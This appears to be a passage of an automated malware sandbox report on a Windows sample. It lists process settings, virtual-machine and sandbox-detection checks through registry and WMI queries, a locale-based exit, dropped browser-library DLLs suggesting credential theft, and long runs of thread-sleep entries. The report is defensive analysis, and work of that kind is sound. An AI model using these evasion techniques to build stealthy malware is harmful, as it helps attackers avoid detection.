Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_1-70428

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 16F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3200000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 5200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 2727BEA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 2727C020000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1710000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3460000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 5460000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4585
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4984
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 4357
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 5447

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-39119

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xtfky	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5ek.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jwjqeqx	Jump to dropped file
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5ek.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	API coverage: 7.5 %
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	API coverage: 2.4 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -37885s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -59858s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -59071s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -59696s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -59588s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -33910s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -59479s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -48915s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -59359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -39508s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -59217s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -55432s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -57750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -57559s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -44022s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -57416s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -52492s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -48862s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -57250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -31123s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -57000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -47980s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -56792s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -56671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -43905s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -56546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -56436s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -45398s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -56305s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -56198s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -48249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -56089s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -45598s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -41526s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -59534s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55764s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55654s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -41943s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -43762s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55327s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -49672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55107s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -55000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -54757s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -54878s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -58269s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -54765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064	Thread sleep time: -54641s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -33748s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -47834s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -39808s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -59040s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -34516s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -35748s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -59284s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -36799s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -32306s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -58881s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -40674s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -59684s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -55447s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828	Thread sleep time: -55111s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 6704	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 6728	Thread sleep time: -922337203685477s >= -30000s
